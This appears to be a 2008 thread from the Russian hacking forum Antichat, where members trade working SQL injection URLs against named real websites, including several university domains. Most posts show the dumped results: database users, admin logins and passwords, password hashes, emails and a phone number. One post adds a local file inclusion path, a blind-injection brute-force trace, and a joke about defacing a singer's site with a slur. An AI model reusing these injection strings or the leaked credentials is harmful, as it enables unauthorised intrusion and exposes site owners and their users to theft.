ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.06.2008, 17:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от baltazar
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,1
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
=(( многоразовый боян.
юзай
http://filefront.jino-net.ru/sql.html
__________________
BlackHat. MoDL
|
|
|
08.06.2008, 20:51
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
nexia.com
Код:
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.20-community-nt�nexiausr@localhost�nexia
Код:
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat(username,0x3,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+tmembers+limit+0,1/*
estudio�gior5ar
|
|
|
|
08.06.2008, 20:57
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Pogoda.ua. Погода в Украине и мире. Погода в Киеве. Прогноз погоды на 10 дней
http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,ema il),3,4,5+from+users+limit+0,1/*
test:test:test@localhost.com
|
|
|
|
08.06.2008, 21:46
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
globaleconomicgovernance.org
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7/*
5.0.45-log�dbo158065722@212.227.118.42�db158065722
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,unhex(hex(concat_ws(0x3,userloginname,userpassword))),3,4,5,6,7+from+upload_users/*
test_user3�2570e9ad6d773db0af65ac057c5e4a7f
|
|
|
|
08.06.2008, 21:46
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от КВР
Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/
Электронная почта
E-mail
Пароль
Password
подставляем " ' " и емеем
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1
Cпособ #3
Емеем в рот =)
(Local include)
http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00
И незабудь резину (Proxy)
Web-defence.ru
Ахха, надо дефейсануть этот сайт и написать от Отара Кушанашвили:
Рудковская гений. Билан - Лучший певец. Только ПИДАРАЗ! 
|
|
|
|
08.06.2008, 23:08
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
torg.ua
Код:
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=1/*
Код:
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=2/*
Смотрите разницу  . Инъекция вывода не имеет, но можно посимвольно брутить, сбрутил версию:
-> Try 30 .. 70 -> Char > 50
-> Try 50 .. 70 -> Char < 60
-> Try 50 .. 61 -> Char < 55
-> Try 50 .. 56 -> Char < 53
-> Try 50 -> NO =(
-> Try 51 -> NO =(
-> Try 52 -> FOUND!
-> Ascii: 52
-> Char: 4
Ничего хорошего, четверка 
|
|
|
|
08.06.2008, 23:14
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
tribeca.org
Код:
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
5.0.24a-standard-log�tribeca_user@apache2-blow.skoda.dreamhost.com�tribecaorgnew
Код:
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat(admin,0x3,admin_pass),3,4,5,6,7,8+from+site_admin/*
admin�admin
mogadishni.com
Код:
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5/*
4.1.20-community-nt�chr@localhost�mogadishni
Код:
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,id,email,phone),2,3,4,5+from+contact+limit+2,1/*
4�loeland@mogadishni.com�+45 32543535
|
|
|
|
09.06.2008, 00:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
rfbd.ru - Телефонные Базы Данных г. Москва, Телефонные Справочники г. Москва, Паспортные Базы Данных г. Москва
http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*
5.0.37-standard-log:a1rfbd_guest@localhost:a1rfbd_ric_datebase
http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,table_name+from+information_schem a.columns+where+column_name=0x70617373776f7264/*
_cms_users
СоюзКредит.ру — быстрый денежный кредит, ипотека и автокредит
http://www.souscredit.ru/?p=4&cat=-1+union+select+1,concat_ws(0x3a,name,login,pass,ma il),3,4+from+users+where+id=1/*
admin:llirik:kirill:admin@souscredit.ru
Последний раз редактировалось ~!DoK_tOR!~; 09.06.2008 в 02:02..
|
|
|
|
09.06.2008, 02:14
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
На сладенькое немного .edu
Код:
http://www.ub.edu/crai/pharmakoteka/registre.php?id=-11+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.cpd.usu.edu/asset.php?id=-111+UNION+SELECT+1,table_name,table_name,table_name,5,6+from+information_schema.tables+limit+15,1/*
http://caxton.emich.edu/guide/guide.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8,9/*
http://math.ucsd.edu/people/profile.php?id=-111+UNION+SELECT+VERSION()/*
http://www.stots.edu/article.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*
|
|
|
|
09.06.2008, 13:06
|
|
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048
Репутация:
5
|
|
http://www.whitleyaward.org/display.php?id=-75+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13, 14,15,16,17 ,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33/
*
http://www.comicstriplibrary.org/display.php?id=-606+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,1 5,16,17,18,19/*
http://www.heroplay.com/features/articles/display.php?id=-27+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12,13,14 ,15,16,17 ,18,19,20,21/*
http://www.isdci.org/display.php?ID=-36+union+select+1,2 ,v ersi on(),4,5,6/*
http://www.noborder.org/actionday2005/display.php?id=-334+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12 ,13,14,1 5,16,17,18,19,20,21,2 2,23,24,25,26,27/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
